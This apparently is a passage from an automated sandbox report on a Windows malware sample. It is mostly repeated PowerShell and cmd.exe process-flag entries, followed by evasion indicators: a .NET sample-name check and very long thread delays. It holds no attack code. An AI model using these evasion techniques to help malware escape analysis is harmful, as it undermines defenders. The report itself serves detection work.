                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                .NET source code contains a sample name check
                Source: 11.2.powershell.exe.6e3a3b0.1.raw.unpack, jgmgx.cs.Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.a859058.6.raw.unpack, jgmgx.cs.Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.9090000.2.raw.unpack, jgmgx.cs.Net Code: Main contains sample name check
                Source: 21.2.powershell.exe.68bbca0.0.raw.unpack, jgmgx.cs.Net Code: Main contains sample name check
                Source: 48.2.powershell.exe.6a95d68.0.raw.unpack, jgmgx.cs.Net Code: Main contains sample name check
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5823Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3953Jump to behavior
